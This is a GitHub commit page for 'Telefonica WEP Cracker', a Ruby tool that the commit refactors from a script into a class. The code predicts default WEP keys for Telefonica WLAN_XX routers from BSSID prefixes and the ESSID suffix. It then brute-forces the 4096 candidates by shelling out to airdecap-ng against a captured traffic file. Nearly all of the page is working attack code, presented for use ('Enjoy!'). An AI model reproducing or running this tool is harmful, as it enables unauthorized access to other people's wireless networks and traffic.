Permalink
Browse files

From a dorky script to a pretty decent class

  • Loading branch information...
1 parent 47649dc commit 5408912b4ef2c9c1fc5e1dc86c7d70ab2dc3c4f8 X committed Jul 30, 2009
Showing with 164 additions and 86 deletions.
  1. +2 −2 README
  2. +15 −0 README~
  3. +0 −84 crack.rb
  4. +38 −0 init.rb
  5. +109 −0 lib/wep_cracker.rb
View
4 README
@@ -7,9 +7,9 @@ NOTE: This script needs aircrack-ng suite to run properly. The airodump capture
-----------------------
-USAGE: ruby crack.rb -b <bssid> -e <essid> -f <airodump_capture_file>
+USAGE: ruby init.rb -b <bssid> -e <essid> -f <airodump_capture_file>
-EXAMPLE: ruby crack.rb -b 00:11:22:33:44:55 -e WLAN_0F -f dump-01.cap
+EXAMPLE: ruby init.rb -b 00:11:22:33:44:55 -e WLAN_0F -f dump-01.cap
Enjoy!
View
15 README~
@@ -0,0 +1,15 @@
+Wep Cracker
+-----------------------
+
+A little script intended to crack Telefonica WEP Keys (the WLAN_XX kind), based on the default WEP key setting on certain router models.
+
+NOTE: This script needs aircrack-ng suite to run properly. The airodump capture file must have at least 1 IV to decrypt.
+
+-----------------------
+
+USAGE: ruby crack.rb -b <bssid> -e <essid> -f <airodump_capture_file>
+
+EXAMPLE: ruby crack.rb -b 00:11:22:33:44:55 -e WLAN_0F -f dump-01.cap
+
+Enjoy!
+
View
@@ -1,84 +0,0 @@
-def get_letter_from(number)
- case number
- when /^001349/
- return "Z"
- when /^0030DA/
- return "C"
- when /^000138/
- return "X"
- else
- return "N"
- end
-end
-
-
-def sec2hms(secs)
- time = secs.round
- sec = time % 60.to_i
- time /= 60
- mins = time % 60
- time /= 60
- hrs = time % 24
- [hrs,mins,sec]
-end
-
-bssid = ''
-essid = ''
-file = ''
-
-ARGV.each_with_index do |arg, num|
- case arg
- when '-b'
- bssid = ARGV[num+1]
- when '-e'
- essid = ARGV[num+1]
- when '-f'
- file = ARGV[num+1]
- end
-end
-
-start = bssid.gsub(':','')[0..6].upcase
-puts start.inspect
-letter = get_letter_from(start)
-ending = essid.split('_').last.upcase
-
-number_options = []
-
-16.times do |f|
- 16.times do |s|
- 16.times do |t|
- number_options << [f.to_s(16),s.to_s(16),t.to_s(16)]
- end
- end
-end
-
-options = []
-
-number_options.each do |n|
- options << "#{letter}#{start}#{n.join.upcase}#{ending}"
-end
-
-rate = 0
-eta = 0
-counter = 0
-starting_at = Time.now
-len = options.length
-options.shuffle.each do |option|
- a = `airdecap-ng -w #{option.unpack('H*')} #{file} -e #{essid}`
- if a.match(/\nNumber of decrypted WEP packets[\s]+[^0]+\n/) then
- puts a
- puts "Decrypted packet with key #{option} !"
- exit(0)
- end
- counter += 1
- rate = (counter / (Time.now - starting_at).to_f).to_i
- eta = sec2hms((len - counter) / rate.to_f)
- elapsed = sec2hms(Time.now.sec - starting_at.sec.to_f)
- showable_eta = "#{eta[0]} hours, #{eta[1]} minutes and #{eta[2]} seconds"
- showable_elapsed = "#{elapsed[0]} hours, #{elapsed[1]} minutes and #{elapsed[2]} seconds"
- system("clear")
- puts "Telefonica WEP Cracker 0.1 Alpha Release"
- puts "Tried #{counter} keys... out of #{len}"
- puts "#{rate} keys/sec | ETA: #{showable_eta} | Elapsed: #{showable_elapsed}"
-end
-
View
38 init.rb
@@ -0,0 +1,38 @@
+require 'rubygems'
+require 'lib/wep_cracker'
+#require 'benchmark'
+
+# First of all, check if airdecap-ng is present. Quit if not!
+
+raise "Your system doesn't seem to have aircrack-ng suite installed.\nPlease install it before using WepCracker." unless `airdecap-ng` =~ /Airdecap-ng [0-9]/
+
+# Get the mandatory arguments from args: BSSID, ESSID and captures file
+
+bssid = ''
+essid = ''
+file = ''
+
+ARGV.each_with_index do |arg, num|
+ case arg
+ when '-b'
+ bssid = ARGV[num+1]
+ raise "This BSSID looks invalid." unless bssid =~ /^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$/
+ when '-e'
+ essid = ARGV[num+1]
+ raise "This ESSID doesn't look like a WLAN_XX kind." unless essid =~ /^WLAN_[0-9a-fA-F]{2}$/
+ when '-f'
+ file = ARGV[num+1]
+ raise "File doesn't exist." unless File.exists?(file)
+ end
+end
+
+
+wep_cracker = WepCracker.new(:bssid => bssid,
+ :essid => essid,
+ :file => file)
+
+#Benchmark.bm(7) do |x|
+# x.report("WepCracker::crack! :") {wep_cracker.crack!}
+#end
+
+wep_cracker.crack!
View
@@ -0,0 +1,109 @@
+class WepCracker
+
+ def initialize(options)
+
+ @bssid ||= options[:bssid]
+ @essid ||= options[:essid]
+ @file ||= options[:file]
+
+ @options = generate_options
+
+ end
+
+ def crack!
+
+ rate = 0
+ eta = 0
+ counter = 0
+ starting_at = Time.now
+ len = @options.length
+ @options.shuffle.each do |option|
+ a = `airdecap-ng -w #{option.unpack('H*')} #{@file} -e #{@essid}`
+ if a.match(/\nNumber of decrypted WEP packets[\s]+[^0]+\n/) then
+ puts "Decrypted packet from #{@essid} (BSSID: #{@bssid} with key #{option} !"
+ exit(0)
+ end
+ counter += 1
+
+ rate = (counter / (Time.now - starting_at).to_f).to_i
+ eta = sec2hms((len - counter) / rate.to_f)
+ elapsed = sec2hms(Time.now.sec - starting_at.sec.to_f)
+ system("clear")
+ puts "Telefonica WEP Cracker 0.1 Alpha Release"
+ puts "Tried #{counter} keys... out of #{len}"
+ puts "#{rate} keys/sec | ETA: #{humanize_time(eta)} | Elapsed: #{humanize_time(elapsed)}"
+ end
+ puts "\n\nSorry, this access point must have changed the default password: it couldn't be cracked."
+
+ end
+
+ private
+
+ def generate_options
+
+ start = @bssid.gsub(':','')[0..6].upcase
+
+ begin
+ letter = get_letter_from(start)
+ rescue=>e
+ puts "There has been an error: #{e}"
+ end
+
+ ending = @essid.split('_').last.upcase
+
+ number_options = []
+ options = []
+
+ 16.times do |f|
+ 16.times do |s|
+ 16.times do |t|
+ number_options << [f.to_s(16),s.to_s(16),t.to_s(16)]
+ end
+ end
+ end
+
+ number_options.each do |n|
+ options << "#{letter}#{start}#{n.join.upcase}#{ending}"
+ end
+
+ return options
+
+ end
+
+ def get_letter_from(number)
+ case number
+ when /^001349/
+ return "Z"
+ when /^0030DA/
+ return "C"
+ when /^000138/
+ return "X"
+ else
+ raise "Unfortunately, this BSSID doesn't belong to any of the three supported router models."
+ end
+ end
+
+ def sec2hms(secs)
+ time = secs.round
+ sec = time % 60.to_i
+ time /= 60
+ mins = time % 60
+ time /= 60
+ hrs = time % 24
+ [hrs,mins,sec]
+ end
+
+ def humanize_time(hms)
+ seconds = "#{hms[2]} second"
+ seconds += 's' if hms[2] != 1
+ minutes = "#{hms[1]} minute"
+ minutes += 's' if hms[1] != 1
+ minutes += ' and '
+ hours = "#{hms[0]} hour"
+ hours += 's' if hms[0] != 1
+ hours += ', '
+ "#{hours}#{minutes}#{seconds}"
+ end
+
+
+end

0 comments on commit 5408912

Please sign in to comment.